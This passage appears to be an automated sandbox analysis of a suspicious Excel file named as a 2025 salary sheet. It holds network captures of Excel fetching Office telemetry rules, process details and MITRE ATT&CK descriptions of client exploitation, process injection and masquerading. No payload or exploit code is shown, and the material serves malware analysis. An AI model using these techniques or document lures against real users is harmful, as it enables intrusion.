Nov 20, 2024 09:18:18.979882002 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979902983 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.979969978 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.979975939 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.980082989 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.980211020 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.980227947 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.980304003 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.980310917 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.980353117 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981182098 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981225014 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981250048 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981256008 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981281042 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981300116 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981509924 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981551886 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981580973 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981586933 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981615067 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981638908 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981895924 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981940031 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.981975079 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.981981039 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:18.982000113 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:18.982026100 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.056082010 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.056138039 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.056205034 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.056222916 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.056248903 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.056267023 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.064551115 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.064591885 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.064621925 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.064637899 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.064656973 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.064673901 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.064945936 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.064986944 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065020084 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065026999 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065047026 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065066099 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065416098 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065460920 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065479994 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065488100 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065530062 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065670013 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065726995 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065742970 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.065751076 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.065792084 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066163063 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.066206932 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.066226959 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066235065 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.066252947 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066359997 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066365957 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.066385984 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066418886 CET	49716	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:19.066422939 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:19.066438913 CET	443	49716	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:22.277700901 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:22.277749062 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:22.277852058 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:22.278083086 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:22.278095961 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:22.917623043 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:22.918256044 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:22.918298006 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:22.919092894 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:22.919106007 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:23.021819115 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:23.021879911 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:23.021975994 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:23.022042036 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:23.022264004 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:23.022264004 CET	49717	443	192.168.2.16	13.107.246.42
Nov 20, 2024 09:18:23.022289991 CET	443	49717	13.107.246.42	192.168.2.16
Nov 20, 2024 09:18:23.022341967 CET	443	49717	13.107.246.42	192.168.2.16

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 20, 2024 09:18:17.434052944 CET	1.1.1.1	192.168.2.16	0x995	No error (0)	shed.dual-low.s-part-0014.t-0009.t-msedge.net	s-part-0014.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 20, 2024 09:18:17.434052944 CET	1.1.1.1	192.168.2.16	0x995	No error (0)	s-part-0014.t-0009.t-msedge.net		13.107.246.42	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

otelrules.azureedge.net

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.16	49716	13.107.246.42	443	5452	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:18:18 UTC	219	OUT	GET /rules/excel.exe-Production-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-20 08:18:18 UTC	493	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:18:18 GMT Content-Type: text/plain Content-Length: 1112622 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 19 Nov 2024 16:37:24 GMT ETag: "0x8DD08B87292E458" x-ms-request-id: ddf1f4c1-c01e-0034-0b19-3b2af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241120T081818Z-1777c6cb754ww792hC1TEBzqu4000000093g00000000dmtg x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-20 08:18:18 UTC	15891	IN	Data Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35 Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32 Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
2024-11-20 08:18:18 UTC	16384	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.16	49717	13.107.246.42	443	5452	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:18:22 UTC	207	OUT	GET /rules/rule120603v8s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-20 08:18:23 UTC	515	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:18:22 GMT Content-Type: text/xml Content-Length: 2128 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA41F3C62" x-ms-request-id: b99423bd-401e-0048-1ef3-3a0409000000 x-ms-version: 2018-03-28 x-azure-ref: 20241120T081822Z-r1d97b99577dd2gchC1TEBz5ys00000008ag00000000fuw0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-20 08:18:23 UTC	2128	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=

Target ID:	0
Start time:	03:17:12
Start date:	20/11/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Salary 2025- workers-v1.xls"
Imagebase:	0xe60000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	03:18:32
Start date:	20/11/2024
Path:	C:\Windows\splwow64.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\splwow64.exe 12288
Imagebase:	0x7ff7b8af0000
File size:	163'840 bytes
MD5 hash:	77DE7761B037061C7C112FD3C5B91E73
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

